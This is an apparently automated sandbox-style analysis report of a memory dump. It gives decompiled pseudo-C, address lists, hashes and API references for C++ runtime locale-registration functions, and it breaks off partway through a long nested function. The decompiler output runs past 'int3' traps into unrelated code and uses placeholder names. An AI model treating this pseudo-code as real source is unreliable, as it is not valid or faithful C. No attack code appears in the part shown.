0x6e1823fb
0x6e182407
0x6e1823b5
0x6e1823b7
0x6e1823bd
0x6e1823c3
0x6e1823c4
0x6e1823ca
0x6e1823cb
0x6e1823ce
0x6e182408
0x6e18240d
0x6e18240e
0x6e182412
0x6e1823d0
0x6e1823d0
0x6e1823d3
0x6e1823d6
0x6e1823db
0x6e1823e5
0x6e1823e8
0x6e1823ee
0x6e1823f1
0x00000000
0x6e1823f1
0x6e1823b9
0x6e1823b9
0x00000000
0x6e1823b9
0x6e1823b7

APIs

__EH_prolog3.LIBCMT ref: 6E182380
std::_Lockit::_Lockit.LIBCPMT ref: 6E18238B

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1823DB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1823FB
Concurrency::cancel_current_task.LIBCPMT ref: 6E182408

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 57f7c24ffcaa6de396fc11e65a3e9506b02c6999f4c9fd8cf668a6f396cbd089
Instruction ID: f57d229806c838259bed4717528a27fa39c4b0a212f0c76f997c151b2c6e0699
Opcode Fuzzy Hash: 57f7c24ffcaa6de396fc11e65a3e9506b02c6999f4c9fd8cf668a6f396cbd089
Instruction Fuzzy Hash: DD11C67190062ADBCB06CFE8C8504EE7779BF49314B204959E525EB280DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E182A2B, Relevance: 7.6, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E182A2B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t21;
				intOrPtr _t28;
				void* _t47;
				intOrPtr* _t49;
				void* _t52;
				void* _t53;

				_t47 = __edx;
				E6E1A9DBF(0x6e1ea3b0, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t52 - 0x14, 0);
				 *(_t52 - 4) = 0;
				_t49 =  *0x6e238bd0;
				 *((intOrPtr*)(_t52 - 0x10)) = _t49;
				_t21 = E6E162171( *((intOrPtr*)(_t52 + 8)), E6E161F29(0, 0x6e238be0, _t49, __esi));
				_t51 = _t21;
				if(_t21 != 0) {
					L5:
					 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
					E6E18F30C(_t52 - 0x14);
					return E6E1A9D88(_t51);
				} else {
					if(_t49 == 0) {
						_push( *((intOrPtr*)(_t52 + 8)));
						_push(_t52 - 0x10);
						__eflags = E6E183233(0, _t47, _t49, _t51) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							_t28 =  *((intOrPtr*)(_t53 + 4));
							__eflags = _t28 - 0x1000;
							if(_t28 < 0x1000) {
								__eflags = _t28;
								if(__eflags == 0) {
									__eflags = 0;
									return 0;
								} else {
									return E6E1A9621(0, _t49, _t51, __eflags, _t28);
								}
							} else {
								return E6E184DC5(0, _t47, _t49, _t51, _t28);
							}
						} else {
							_t51 =  *((intOrPtr*)(_t52 - 0x10));
							 *((intOrPtr*)(_t52 - 0x10)) = _t51;
							 *(_t52 - 4) = 1;
							E6E1911C1(__eflags, _t51);
							 *((intOrPtr*)( *_t51 + 4))();
							 *0x6e238bd0 = _t51;
							 *((intOrPtr*)(_t52 - 0x10)) = 0;
							 *(_t52 - 4) = 0;
							goto L5;
						}
					} else {
						_t51 = _t49;
						goto L5;
					}
				}
			}

0x6e182a2b
0x6e182a32
0x6e182a3d
0x6e182a42
0x6e182a4a
0x6e182a50
0x6e182a5c
0x6e182a61
0x6e182a65
0x6e182aa6
0x6e182aa6
0x6e182aad
0x6e182ab9
0x6e182a67
0x6e182a69
0x6e182a6f
0x6e182a75
0x6e182a7d
0x6e182a80
0x6e182aba
0x6e182abf
0x6e182ac0
0x6e182ac4
0x6e182ac9
0x6e182ad3
0x6e182ad5
0x6e182adf
0x6e182ae1
0x6e182ad7
0x6e182ade
0x6e182ade
0x6e182acb
0x6e182ad2
0x6e182ad2
0x6e182a82
0x6e182a82
0x6e182a85
0x6e182a88
0x6e182a8d
0x6e182a97
0x6e182a9a
0x6e182aa0
0x6e182aa3
0x00000000
0x6e182aa3
0x6e182a6b
0x6e182a6b
0x00000000
0x6e182a6b
0x6e182a69

APIs

__EH_prolog3.LIBCMT ref: 6E182A32
std::_Lockit::_Lockit.LIBCPMT ref: 6E182A3D

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E182A8D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182AAD
Concurrency::cancel_current_task.LIBCPMT ref: 6E182ABA

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: db007c585a72c627721c9ea7a461767b91bc40d17ac404958e42da440e8462ee
Instruction ID: 2e6e07aba4ac90b499b5bd709a74e824e41124fdd0be9dea2a1e020004dbd3df
Opcode Fuzzy Hash: db007c585a72c627721c9ea7a461767b91bc40d17ac404958e42da440e8462ee
Instruction Fuzzy Hash: C711A57590062ADBCB16DFE8C8505EEB77A7F44714B204A49D426EB2C0DB308A85EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1813A3, Relevance: 7.6, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1813A3(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				void* _v16;
				void* _v20;
				void* _t34;
				signed int _t37;
				char* _t39;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t59;
				intOrPtr* _t60;
				signed int _t65;

				E6E1A9DBF(0x6e1ea3b0, __ebx, __edi, __esi, 8);
				E6E18F2A5( &_v20, 0);
				_v4 = 0;
				_t57 =  *0x6e238bcc;
				_v16 = _t57;
				_t59 = E6E162171(_a8, E6E161F29(0, 0x6e221480, _t57, __esi));
				if(_t59 != 0) {
					L5:
					_v4 = _v4 | 0xffffffff;
					E6E18F30C( &_v20);
					return E6E1A9D88(_t59);
				} else {
					if(_t57 == 0) {
						_push(_a8);
						_push( &_v16);
						_t34 = E6E162447(0, _t57, _t59);
						_pop(_t50);
						__eflags = _t34 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							_push(0xffffffff);
							_push(E6E1EA3DA);
							_push( *[fs:0x0]);
							_push(_t50);
							_push(_t59);
							_t37 =  *0x6e21801c; // 0x57d971a9
							_push(_t37 ^ _t65);
							_t39 =  &_v16;
							 *[fs:0x0] = _t39;
							_t60 = _t50;
							_v20 = _t60;
							 *_t60 = 0x6e20eb68;
							_v8 = _v8 & 0x00000000;
							__eflags =  *(_t60 + 0xc);
							if( *(_t60 + 0xc) != 0) {
								_t39 = E6E1C136B( *(_t60 + 0xc));
							}
							_t22 =  &_v8;
							 *_t22 = _v8 | 0xffffffff;
							__eflags =  *_t22;
							 *_t60 = 0x6e1fc7dc;
							 *[fs:0x0] = _v16;
							return _t39;
						} else {
							_t59 = _v16;
							_v16 = _t59;
							_v4 = 1;
							E6E1911C1(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e238bcc = _t59;
							_v16 = 0;
							_v4 = 0;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6e1813aa
0x6e1813b5
0x6e1813ba
0x6e1813c2
0x6e1813c8
0x6e1813d9
0x6e1813dd
0x6e18141e
0x6e18141e
0x6e181425
0x6e181431
0x6e1813df
0x6e1813e1
0x6e1813e7
0x6e1813ed
0x6e1813ee
0x6e1813f4
0x6e1813f5
0x6e1813f8
0x6e181432
0x6e181437
0x6e18143b
0x6e18143d
0x6e181448
0x6e181449
0x6e18144a
0x6e18144b
0x6e181452
0x6e181453
0x6e181456
0x6e18145c
0x6e18145e
0x6e181461
0x6e181467
0x6e18146b
0x6e18146f
0x6e181474
0x6e181479
0x6e18147a
0x6e18147a
0x6e18147a
0x6e18147e
0x6e181487
0x6e181491
0x6e1813fa
0x6e1813fa
0x6e1813fd
0x6e181400
0x6e181405
0x6e18140f
0x6e181412
0x6e181418
0x6e18141b
0x00000000
0x6e18141b
0x6e1813e3
0x6e1813e3
0x00000000
0x6e1813e3
0x6e1813e1

APIs

__EH_prolog3.LIBCMT ref: 6E1813AA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1813B5

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E181405
std::_Lockit::~_Lockit.LIBCPMT ref: 6E181425
Concurrency::cancel_current_task.LIBCPMT ref: 6E181432

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: f80aebf10a951f3fbe918898240e3c7fe494f92c7f1a98ba707dc0e88364cf8d
Instruction ID: c8bd9356940136bb753bf213a0bbd8adf3925c21c72c38f7fddb34a99ad4d216
Opcode Fuzzy Hash: f80aebf10a951f3fbe918898240e3c7fe494f92c7f1a98ba707dc0e88364cf8d
Instruction Fuzzy Hash: 1B11A975A0052ADBCB06DFE8C8504EEB7797F55314B204959D435EB2C0DB308A85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E198FF6, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E198FF6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t206;
				void* _t376;
				signed int _t545;
				void* _t594;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				void* _t646;

				_t449 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t646 - 0x14, 0);
				_t613 =  *0x6e221724; // 0x0
				 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
				 *(_t646 - 0x10) = _t613;
				_t206 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(__ebx, 0x6e2216d0, __edi, _t613));
				_t596 = _t206;
				if(_t206 != 0) {
					L5:
					E6E18F30C(_t646 - 0x14);
					return E6E1A9D88(_t596);
				} else {
					if(_t613 == 0) {
						_push( *((intOrPtr*)(_t646 + 8)));
						_push(_t646 - 0x10);
						__eflags = E6E19ABD3(__ebx, _t596, _t613) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t449, _t596, _t613, 8);
							E6E18F2A5(_t646 - 0x14, 0);
							_t614 =  *0x6e2216f4; // 0x0
							 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
							 *(_t646 - 0x10) = _t614;
							_t597 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216a8, _t596, _t614));
							__eflags = _t597;
							if(_t597 != 0) {
								L12:
								E6E18F30C(_t646 - 0x14);
								return E6E1A9D88(_t597);
							} else {
								__eflags = _t614;
								if(_t614 == 0) {
									_push( *((intOrPtr*)(_t646 + 8)));
									_push(_t646 - 0x10);
									__eflags = E6E19AC3B(_t449, _t597, _t614) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t449, _t597, _t614, 8);
										E6E18F2A5(_t646 - 0x14, 0);
										_t615 =  *0x6e221728; // 0x0
										 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
										 *(_t646 - 0x10) = _t615;
										_t598 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216d4, _t597, _t615));
										__eflags = _t598;
										if(_t598 != 0) {
											L19:
											E6E18F30C(_t646 - 0x14);
											return E6E1A9D88(_t598);
										} else {
											__eflags = _t615;
											if(_t615 == 0) {
												_push( *((intOrPtr*)(_t646 + 8)));
												_push(_t646 - 0x10);
												__eflags = E6E19ACA3(_t449, _t598, _t615) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t449, _t598, _t615, 8);
													E6E18F2A5(_t646 - 0x14, 0);
													_t616 =  *0x6e2216f8; // 0x0
													 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
													 *(_t646 - 0x10) = _t616;
													_t599 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216ac, _t598, _t616));
													__eflags = _t599;
													if(_t599 != 0) {
														L26:
														E6E18F30C(_t646 - 0x14);
														return E6E1A9D88(_t599);
													} else {
														__eflags = _t616;
														if(_t616 == 0) {
															_push( *((intOrPtr*)(_t646 + 8)));
															_push(_t646 - 0x10);
															__eflags = E6E19AD0B(_t449, _t599, _t616) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t449, _t599, _t616, 8);
																E6E18F2A5(_t646 - 0x14, 0);
																_t617 =  *0x6e221730; // 0x0
																 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																 *(_t646 - 0x10) = _t617;
																_t600 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216dc, _t599, _t617));
																__eflags = _t600;
																if(_t600 != 0) {
																	L33:
																	E6E18F30C(_t646 - 0x14);
																	return E6E1A9D88(_t600);
																} else {
																	__eflags = _t617;
																	if(_t617 == 0) {
																		_push( *((intOrPtr*)(_t646 + 8)));
																		_push(_t646 - 0x10);
																		__eflags = E6E19AD73(_t449, _t600, _t617) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t449, _t600, _t617, 8);
																			E6E18F2A5(_t646 - 0x14, 0);
																			_t618 =  *0x6e22172c; // 0x0
																			 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																			 *(_t646 - 0x10) = _t618;
																			_t601 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216d8, _t600, _t618));
																			__eflags = _t601;
																			if(_t601 != 0) {
																				L40:
																				E6E18F30C(_t646 - 0x14);
																				return E6E1A9D88(_t601);
																			} else {
																				__eflags = _t618;
																				if(_t618 == 0) {
																					_push( *((intOrPtr*)(_t646 + 8)));
																					_push(_t646 - 0x10);
																					__eflags = E6E19ADF7(_t449, _t601, _t618) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t449, _t601, _t618, 8);
																						E6E18F2A5(_t646 - 0x14, 0);
																						_t619 =  *0x6e221700; // 0x0
																						 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																						 *(_t646 - 0x10) = _t619;
																						_t602 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216b4, _t601, _t619));
																						__eflags = _t602;
																						if(_t602 != 0) {
																							L47:
																							E6E18F30C(_t646 - 0x14);
																							return E6E1A9D88(_t602);
																						} else {
																							__eflags = _t619;
																							if(_t619 == 0) {
																								_push( *((intOrPtr*)(_t646 + 8)));
																								_push(_t646 - 0x10);
																								__eflags = E6E19AE7C(_t449, _t602, _t619) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t449, _t602, _t619, 8);
																									E6E18F2A5(_t646 - 0x14, 0);
																									_t620 =  *0x6e2216fc; // 0x0
																									 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																									 *(_t646 - 0x10) = _t620;
																									_t603 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216b0, _t602, _t620));
																									__eflags = _t603;
																									if(_t603 != 0) {
																										L54:
																										E6E18F30C(_t646 - 0x14);
																										return E6E1A9D88(_t603);
																									} else {
																										__eflags = _t620;
																										if(_t620 == 0) {
																											_push( *((intOrPtr*)(_t646 + 8)));
																											_push(_t646 - 0x10);
																											__eflags = E6E19AF00(_t449, _t603, _t620) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t449, _t603, _t620, 8);
																												E6E18F2A5(_t646 - 0x14, 0);
																												_t621 =  *0x6e221710; // 0x0
																												 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																												 *(_t646 - 0x10) = _t621;
																												_t604 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216bc, _t603, _t621));
																												__eflags = _t604;
																												if(_t604 != 0) {
																													L61:
																													E6E18F30C(_t646 - 0x14);
																													return E6E1A9D88(_t604);
																												} else {
																													__eflags = _t621;
																													if(_t621 == 0) {
																														_push( *((intOrPtr*)(_t646 + 8)));
																														_push(_t646 - 0x10);
																														__eflags = E6E19AF85(_t449, _t604, _t621) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t449, _t604, _t621, 8);
																															E6E18F2A5(_t646 - 0x14, 0);
																															_t622 =  *0x6e2216e8; // 0x0
																															 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																															 *(_t646 - 0x10) = _t622;
																															_t605 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e22169c, _t604, _t622));
																															__eflags = _t605;
																															if(_t605 != 0) {
																																L68:
																																E6E18F30C(_t646 - 0x14);
																																return E6E1A9D88(_t605);
																															} else {
																																__eflags = _t622;
																																if(_t622 == 0) {
																																	_push( *((intOrPtr*)(_t646 + 8)));
																																	_push(_t646 - 0x10);
																																	__eflags = E6E19AFED(_t449, _t605, _t622) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t449, _t605, _t622, 8);
																																		E6E18F2A5(_t646 - 0x14, 0);
																																		_t623 =  *0x6e221714; // 0x0
																																		 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																																		 *(_t646 - 0x10) = _t623;
																																		_t606 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216c0, _t605, _t623));
																																		__eflags = _t606;
																																		if(_t606 != 0) {
																																			L75:
																																			E6E18F30C(_t646 - 0x14);
																																			return E6E1A9D88(_t606);
																																		} else {
																																			__eflags = _t623;
																																			if(_t623 == 0) {
																																				_push( *((intOrPtr*)(_t646 + 8)));
																																				_push(_t646 - 0x10);
																																				__eflags = E6E19B055(_t449, _t606, _t623) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t449, _t606, _t623, 8);
																																					E6E18F2A5(_t646 - 0x14, 0);
																																					_t624 =  *0x6e221718; // 0x0
																																					 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																																					 *(_t646 - 0x10) = _t624;
																																					_t607 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216c4, _t606, _t624));
																																					__eflags = _t607;
																																					if(_t607 != 0) {
																																						L82:
																																						E6E18F30C(_t646 - 0x14);
																																						return E6E1A9D88(_t607);
																																					} else {
																																						__eflags = _t624;
																																						if(_t624 == 0) {
																																							_push( *((intOrPtr*)(_t646 + 8)));
																																							_push(_t646 - 0x10);
																																							__eflags = E6E19B0BD(_t449, _t607, _t624) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ec3ec, _t449, _t607, _t624, 8);
																																								E6E18F2A5(_t646 - 0x14, 0);
																																								_t625 =  *0x6e221734; // 0x0
																																								 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																																								 *(_t646 - 0x10) = _t625;
																																								_t608 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216e0, _t607, _t625));
																																								__eflags = _t608;
																																								if(_t608 != 0) {
																																									L89:
																																									E6E18F30C(_t646 - 0x14);
																																									return E6E1A9D88(_t608);
																																								} else {
																																									__eflags = _t625;
																																									if(_t625 == 0) {
																																										_push( *((intOrPtr*)(_t646 + 8)));
																																										_push(_t646 - 0x10);
																																										__eflags = E6E19B138(_t449, _t608, _t625) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E161CB5(__eflags);
																																											asm("int3");
																																											E6E1A9DBF(0x6e1ec3ec, _t449, _t608, _t625, 8);
																																											E6E18F2A5(_t646 - 0x14, 0);
																																											_t626 =  *0x6e221704; // 0x0
																																											 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																																											 *(_t646 - 0x10) = _t626;
																																											_t609 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216b8, _t608, _t626));
																																											__eflags = _t609;
																																											if(_t609 != 0) {
																																												L96:
																																												E6E18F30C(_t646 - 0x14);
																																												return E6E1A9D88(_t609);
																																											} else {
																																												__eflags = _t626;
																																												if(_t626 == 0) {
																																													_push( *((intOrPtr*)(_t646 + 8)));
																																													_push(_t646 - 0x10);
																																													__eflags = E6E19B1A4(_t449, _t609, _t626) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E161CB5(__eflags);
																																														asm("int3");
																																														E6E1A9DBF(0x6e1ec3ec, _t449, _t609, _t626, 8);
																																														E6E18F2A5(_t646 - 0x14, 0);
																																														_t627 =  *0x6e221738; // 0x0
																																														 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																																														 *(_t646 - 0x10) = _t627;
																																														_t610 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e2216e4, _t609, _t627));
																																														__eflags = _t610;
																																														if(_t610 != 0) {
																																															L103:
																																															E6E18F30C(_t646 - 0x14);
																																															return E6E1A9D88(_t610);
																																														} else {
																																															__eflags = _t627;
																																															if(_t627 == 0) {
																																																_push( *((intOrPtr*)(_t646 + 8)));
																																																_push(_t646 - 0x10);
																																																__eflags = E6E19B210(_t449, _t610, _t627) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E161CB5(__eflags);
																																																	asm("int3");
																																																	E6E1A9DBF(0x6e1ec3ec, _t449, _t610, _t627, 8);
																																																	E6E18F2A5(_t646 - 0x14, 0);
																																																	_t628 =  *0x6e221708; // 0x0
																																																	 *(_t646 - 4) =  *(_t646 - 4) & 0x00000000;
																																																	 *(_t646 - 0x10) = _t628;
																																																	_t611 = E6E162171( *((intOrPtr*)(_t646 + 8)), E6E161F29(_t449, 0x6e221698, _t610, _t628));
																																																	__eflags = _t611;
																																																	if(_t611 != 0) {
																																																		L110:
																																																		E6E18F30C(_t646 - 0x14);
																																																		return E6E1A9D88(_t611);
																																																	} else {
																																																		__eflags = _t628;
																																																		if(_t628 == 0) {
																																																			_push( *((intOrPtr*)(_t646 + 8)));
																																																			_push(_t646 - 0x10);
																																																			_t376 = E6E19B284(_t449, _t611, _t628);
																																																			_pop(_t545);
																																																			__eflags = _t376 - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E161CB5(__eflags);
																																																				asm("int3");
																																																				E6E1A9DBF(0x6e1ecb1a, _t449, _t611, _t628, 4);
																																																				_t629 = _t545;
																																																				 *(_t646 - 0x10) = _t629;
																																																				 *((intOrPtr*)(_t629 + 4)) =  *((intOrPtr*)(_t646 + 0xc));
																																																				_push( *((intOrPtr*)(_t646 + 0x14)));
																																																				_t199 = _t646 - 4;
																																																				 *_t199 =  *(_t646 - 4) & 0x00000000;
																																																				__eflags =  *_t199;
																																																				 *_t629 = 0x6e1f225c;
																																																				 *((char*)(_t629 + 0x28)) =  *((intOrPtr*)(_t646 + 0x10));
																																																				E6E19F3D8(_t449, _t545, _t594, _t611, _t629,  *_t199);
																																																				return E6E1A9D88(_t629,  *((intOrPtr*)(_t646 + 8)));
																																																			} else {
																																																				_t611 =  *(_t646 - 0x10);
																																																				 *(_t646 - 0x10) = _t611;
																																																				 *(_t646 - 4) = 1;
																																																				E6E1911C1(__eflags, _t611);
																																																				 *0x6e1ee1b4();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t611 + 4))))();
																																																				 *0x6e221708 = _t611;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t611 = _t628;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t610 =  *(_t646 - 0x10);
																																																	 *(_t646 - 0x10) = _t610;
																																																	 *(_t646 - 4) = 1;
																																																	E6E1911C1(__eflags, _t610);
																																																	 *0x6e1ee1b4();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t610 + 4))))();
																																																	 *0x6e221738 = _t610;
																																																	goto L103;
																																																}
																																															} else {
																																																_t610 = _t627;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t609 =  *(_t646 - 0x10);
																																														 *(_t646 - 0x10) = _t609;
																																														 *(_t646 - 4) = 1;
																																														E6E1911C1(__eflags, _t609);
																																														 *0x6e1ee1b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t609 + 4))))();
																																														 *0x6e221704 = _t609;
																																														goto L96;
																																													}
																																												} else {
																																													_t609 = _t626;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t608 =  *(_t646 - 0x10);
																																											 *(_t646 - 0x10) = _t608;
																																											 *(_t646 - 4) = 1;
																																											E6E1911C1(__eflags, _t608);
																																											 *0x6e1ee1b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t608 + 4))))();
																																											 *0x6e221734 = _t608;
																																											goto L89;
																																										}
																																									} else {
																																										_t608 = _t625;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t607 =  *(_t646 - 0x10);
																																								 *(_t646 - 0x10) = _t607;
																																								 *(_t646 - 4) = 1;
																																								E6E1911C1(__eflags, _t607);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t607 + 4))))();
																																								 *0x6e221718 = _t607;
																																								goto L82;
																																							}
																																						} else {
																																							_t607 = _t624;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t606 =  *(_t646 - 0x10);
																																					 *(_t646 - 0x10) = _t606;
																																					 *(_t646 - 4) = 1;
																																					E6E1911C1(__eflags, _t606);
																																					 *0x6e1ee1b4();
